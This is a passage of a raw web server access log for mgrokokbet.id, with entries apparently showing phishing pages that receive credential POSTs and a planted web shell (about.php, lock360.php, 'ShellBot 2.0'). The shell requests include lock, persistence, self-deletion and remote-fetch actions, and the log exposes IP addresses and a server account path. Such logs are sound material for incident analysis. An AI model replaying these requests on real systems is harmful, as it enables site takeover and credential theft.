Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:05:43 -0400] "POST /wsssk.php HTTP/1.1" 200 3161 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:06:08 -0400] "GET /Rest.html HTTP/1.1" 200 8912 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 102.164.97.56 - - [23/Apr/2025:13:06:18 -0400] "POST /login.php HTTP/1.1" 200 314 "https://mgrokokbet.id/Rest.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 102.164.97.56 - - [23/Apr/2025:13:06:20 -0400] "GET /login HTTP/1.1" 404 1251 "https://mgrokokbet.id/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 102.164.97.56 - - [23/Apr/2025:13:06:22 -0400] "GET /favicon.ico HTTP/1.1" 404 1251 "https://mgrokokbet.id/login" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 102.164.97.56 - - [23/Apr/2025:13:06:48 -0400] "POST /wsssk.php HTTP/1.1" 200 2765 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:06:52 -0400] "POST /wsssk.php HTTP/1.1" 200 2797 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:10:02 -0400] "POST /wsssk.php HTTP/1.1" 200 2796 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:10:07 -0400] "POST /wsssk.php HTTP/1.1" 200 3421 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:10:42 -0400] "GET /Rest.html HTTP/1.1" 200 8912 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 102.164.97.56 - - [23/Apr/2025:13:10:48 -0400] "POST /login.php HTTP/1.1" 404 1251 "https://mgrokokbet.id/Rest.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 102.164.97.56 - - [23/Apr/2025:13:19:48 -0400] "GET /tm.html HTTP/1.1" 200 8917 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:19:49 -0400] "GET /internet-product/broadband/nbn/ip-check HTTP/1.1" 404 1251 "https://mgrokokbet.id/tm.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:19:50 -0400] "GET /tm.html HTTP/1.1" 200 8917 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:19:51 -0400] "GET /internet-product/broadband/nbn/ip-check HTTP/1.1" 404 1251 "https://mgrokokbet.id/tm.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:20:03 -0400] "POST /mywestnet.php HTTP/1.1" 404 1251 "https://mgrokokbet.id/tm.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:21:40 -0400] "POST /mywestnet.php HTTP/1.1" 404 1251 "https://mgrokokbet.id/tm.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:22:01 -0400] "POST /mywestnet.php HTTP/1.1" 404 1251 "https://mgrokokbet.id/tm.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:22:08 -0400] "GET /tm.html HTTP/1.1" 200 8917 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:22:09 -0400] "GET /internet-product/broadband/nbn/ip-check HTTP/1.1" 404 1251 "https://mgrokokbet.id/tm.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:28:52 -0400] "POST /wsssk.php HTTP/1.1" 200 2248 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:28:56 -0400] "POST /wsssk.php HTTP/1.1" 200 3117 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:29:19 -0400] "POST /wsssk.php HTTP/1.1" 200 12902 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:29:46 -0400] "POST /wsssk.php HTTP/1.1" 200 3118 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:30:00 -0400] "POST /wsssk.php HTTP/1.1" 200 2476 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:30:07 -0400] "POST /wsssk.php HTTP/1.1" 200 3424 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:30:10 -0400] "POST /wsssk.php HTTP/1.1" 200 3116 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:30:36 -0400] "POST /wsssk.php HTTP/1.1" 200 2972 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:30:43 -0400] "POST /wsssk.php HTTP/1.1" 200 6428 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:30:47 -0400] "POST /wsssk.php HTTP/1.1" 200 2973 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:30:59 -0400] "POST /wsssk.php HTTP/1.1" 200 2505 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:31:04 -0400] "POST /wsssk.php HTTP/1.1" 200 3447 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:31:06 -0400] "POST /wsssk.php HTTP/1.1" 200 2969 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:31:18 -0400] "POST /wsssk.php HTTP/1.1" 200 3036 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:31:57 -0400] "POST /wsssk.php HTTP/1.1" 200 3091 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:32:27 -0400] "GET /640275/Rest.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:32:36 -0400] "GET /640275/Rest.html HTTP/1.1" 200 8912 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:32:41 -0400] "POST /640275/login.php HTTP/1.1" 403 1242 "https://mgrokokbet.id/640275/Rest.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:47:22 -0400] "GET /640275/Rest.html HTTP/1.1" 200 8912 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:48:17 -0400] "POST /640275/login.php HTTP/1.1" 403 1242 "https://mgrokokbet.id/640275/Rest.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 51.222.253.16 - - [23/Apr/2025:14:18:29 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" 102.164.97.56 - - [23/Apr/2025:14:32:03 -0400] "GET /Rest.html HTTP/1.1" 200 8912 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 102.164.97.56 - - [23/Apr/2025:14:32:12 -0400] "POST /login.php HTTP/1.1" 404 1251 "https://mgrokokbet.id/Rest.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 102.164.97.56 - - [23/Apr/2025:14:32:12 -0400] "GET /favicon.ico HTTP/1.1" 404 1251 "https://mgrokokbet.id/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 102.164.97.56 - - [23/Apr/2025:14:32:16 -0400] "GET /Rest.html HTTP/1.1" 200 8912 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 104.131.103.19 - - [23/Apr/2025:14:33:31 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:14:34:28 -0400] "GET /Rest.html HTTP/1.1" 200 8912 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 102.164.97.56 - - [23/Apr/2025:14:34:56 -0400] "GET /Rest HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; U; Android 13; itel A665L Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/135.0.7049.99 Mobile Safari/537.36 OPR/89.0.2254.76420" 102.164.97.56 - - [23/Apr/2025:14:34:57 -0400] "GET /favicon.ico HTTP/1.1" 404 1251 "https://mgrokokbet.id/Rest" "Mozilla/5.0 (Linux; U; Android 13; itel A665L Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/135.0.7049.99 Mobile Safari/537.36 OPR/89.0.2254.76420" 102.164.97.56 - - [23/Apr/2025:14:36:03 -0400] "GET /Rest.html HTTP/1.1" 200 8912 "-" "Mozilla/5.0 (Linux; U; Android 13; itel A665L Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/135.0.7049.99 Mobile Safari/537.36 OPR/89.0.2254.76420" 102.212.137.139 - - [23/Apr/2025:14:40:12 -0400] "GET /Rest.html HTTP/1.1" 200 8912 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36" 66.249.93.173 - - [23/Apr/2025:14:40:29 -0400] "GET /Rest.html HTTP/1.1" 200 8912 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G930V Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" 102.212.137.139 - - [23/Apr/2025:14:42:57 -0400] "GET /Rest.html HTTP/1.1" 200 8912 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36" 102.212.137.139 - - [23/Apr/2025:14:43:15 -0400] "GET /Rest.html HTTP/1.1" 200 8912 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36" 149.154.161.253 - - [23/Apr/2025:14:49:09 -0400] "GET /Rest.html HTTP/1.1" 200 8912 "-" "TelegramBot (like TwitterBot)" 102.164.97.56 - - [23/Apr/2025:14:54:57 -0400] "GET /Rest.html HTTP/1.1" 200 8912 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 102.164.97.56 - - [23/Apr/2025:14:55:22 -0400] "GET /Rest.html HTTP/1.1" 200 8912 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 102.164.97.56 - - [23/Apr/2025:14:55:34 -0400] "GET /Rest.html HTTP/1.1" 200 8912 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 102.164.97.56 - - [23/Apr/2025:14:55:41 -0400] "GET /Rest.html HTTP/1.1" 200 8912 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 102.164.97.56 - - [23/Apr/2025:14:55:55 -0400] "GET /Rest.html HTTP/1.1" 200 8912 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 102.164.97.56 - - [23/Apr/2025:14:56:22 -0400] "POST /login.php HTTP/1.1" 404 1251 "https://mgrokokbet.id/Rest.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 77.111.245.14 - - [23/Apr/2025:14:57:01 -0400] "GET /Rest.html HTTP/1.1" 200 8912 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 77.111.245.14 - - [23/Apr/2025:14:57:27 -0400] "POST /login.php HTTP/1.1" 404 1251 "https://mgrokokbet.id/Rest.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 77.111.245.14 - - [23/Apr/2025:14:57:51 -0400] "GET /Rest.html HTTP/1.1" 200 8912 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 191.102.155.26 - - [23/Apr/2025:15:17:07 -0400] "GET / HTTP/1.1" 200 0 "-" "Apache-HttpClient/5.1.4 (Java/11.0.18)" 54.164.157.105 - - [23/Apr/2025:15:21:47 -0400] "GET / HTTP/1.1" 200 0 "-" "okhttp/4.9.2" 54.164.157.105 - - [23/Apr/2025:15:21:48 -0400] "GET /favicon.ico HTTP/1.1" 404 1251 "-" "okhttp/4.9.2" 54.164.157.105 - - [23/Apr/2025:15:21:48 -0400] "GET /favicon.png HTTP/1.1" 404 1251 "-" "okhttp/4.9.2" 108.136.206.220 - - [23/Apr/2025:19:55:37 -0400] "GET /admin/assets/tinymce/filemanager/dialog.php HTTP/1.1" 404 1251 "-" "Go-http-client/1.1" 104.236.240.17 - - [23/Apr/2025:20:00:56 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 138.68.172.160 - - [23/Apr/2025:20:02:30 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.0; +https://openai.com/gptbot)" 147.182.249.61 - - [23/Apr/2025:20:05:50 -0400] "GET /robots.txt HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0" 209.97.164.113 - - [23/Apr/2025:20:16:51 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" 165.232.158.42 - - [23/Apr/2025:20:23:08 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)" 63.141.227.138 - - [23/Apr/2025:20:30:01 -0400] "GET /640275/about.php?520&d_time HTTP/1.1" 200 38 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 51.222.253.7 - - [23/Apr/2025:20:47:07 -0400] "GET /robots.txt HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" 51.222.253.14 - - [23/Apr/2025:20:47:08 -0400] "GET /640275/ HTTP/1.1" 404 0 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" 199.168.98.202 - - [23/Apr/2025:20:58:35 -0400] "GET /640275/about.php?520 HTTP/1.1" 200 109 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:20:58:36 -0400] "GET /640275/about.php?520 HTTP/1.1" 200 109 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:20:58:36 -0400] "POST /640275/about.php?520 HTTP/1.1" 200 1904 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:20:58:37 -0400] "POST /640275/about.php?520 HTTP/1.1" 200 1941 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:20:58:37 -0400] "GET /640275/lock360.php?ac=p&api=&path=&t=650adf113939f450c764fa0c091b7f06 HTTP/1.1" 200 36 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:20:58:38 -0400] "GET /index.php?params HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:20:58:38 -0400] "GET /640275/lock360.php?ac=u-about&api=&path=&t=650adf113939f450c764fa0c091b7f06 HTTP/1.1" 200 43 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:20:58:39 -0400] "GET /640275/lock360.php?ac=i_old&api=http://6146-ch4-v288.img7yahoo.com&path=/home/megavujh/mgrokokbet.id&t=650adf113939f450c764fa0c091b7f06&s=1 HTTP/1.1" 200 21 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:20:58:40 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:20:58:41 -0400] "GET /about.php HTTP/1.1" 404 0 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html; (greenwich&lewisham))" 199.168.98.202 - - [23/Apr/2025:20:58:41 -0400] "GET /index.php HTTP/1.1" 200 229784 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html; (greenwich&lewisham))" 199.168.98.202 - - [23/Apr/2025:20:58:43 -0400] "GET /?page-test-.shtml HTTP/1.1" 200 232791 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html; (greenwich&lewisham))" 199.168.98.202 - - [23/Apr/2025:20:58:45 -0400] "GET /?page-test-.shtml HTTP/1.1" 200 0 "https://www.yahoo.co.jp/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.92 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:20:58:47 -0400] "GET /?params HTTP/1.1" 200 297 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 199.168.98.202 - - [23/Apr/2025:20:58:47 -0400] "GET /640275/lock360.php?ac=access_lock&api=&path=/home/megavujh/mgrokokbet.id&t=650adf113939f450c764fa0c091b7f06&s=1 HTTP/1.1" 200 6 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:20:58:49 -0400] "GET /640275/lock360.php?ac=memory_lock&api=&path=/home/megavujh/mgrokokbet.id&t=650adf113939f450c764fa0c091b7f06&s=1 HTTP/1.1" 200 15 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:20:58:52 -0400] "GET /640275/lock360.php?ac=check_lock_status&api=&path=/home/megavujh/mgrokokbet.id/index.php&t=650adf113939f450c764fa0c091b7f06&s=1 HTTP/1.1" 200 15 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:20:58:55 -0400] "GET /640275/lock360.php?ac=cl&api=&path=/home/megavujh/mgrokokbet.id&t=650adf113939f450c764fa0c091b7f06 HTTP/1.1" 200 1388 "https://mgrokokbet.id/640275/lock360.php?ac=cl&api=&path=/home/megavujh/mgrokokbet.id&t=650adf113939f450c764fa0c091b7f06" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:20:58:56 -0400] "GET /640275/lock360.php?ac=all_h&api=&path=/home/megavujh/mgrokokbet.id&t=650adf113939f450c764fa0c091b7f06&s=1 HTTP/1.1" 200 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:20:58:57 -0400] "GET /640275/lock360.php?ac=delete_myself&api=&path=&t=650adf113939f450c764fa0c091b7f06 HTTP/1.1" 200 15 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 198.204.240.42 - - [23/Apr/2025:21:26:47 -0400] "GET / HTTP/1.1" 200 2273 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36" 198.204.240.42 - - [23/Apr/2025:21:26:48 -0400] "GET / HTTP/1.1" 200 2273 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 52.167.144.17 - - [23/Apr/2025:21:26:56 -0400] "GET /info.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:21:40:29 -0400] "GET /about.php?520 HTTP/1.1" 404 1251 "-" "ShellBot 2.0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:21:40:29 -0400] "GET /favicon.ico HTTP/1.1" 404 1251 "https://mgrokokbet.id/about.php?520" "ShellBot 2.0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:21:40:40 -0400] "GET /640275/about.php?520 HTTP/1.1" 200 60 "-" "ShellBot 2.0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:21:40:53 -0400] "POST /640275/about.php?520 HTTP/1.1" 200 892 "https://mgrokokbet.id/640275/about.php?520" "ShellBot 2.0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:21:40:57 -0400] "GET /640275/about.php?p=%E0%A6%95home%E0%A6%95megavujh%E0%A6%95mgrokokbet.id HTTP/1.1" 200 1447 "https://mgrokokbet.id/640275/about.php?520" "ShellBot 2.0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like 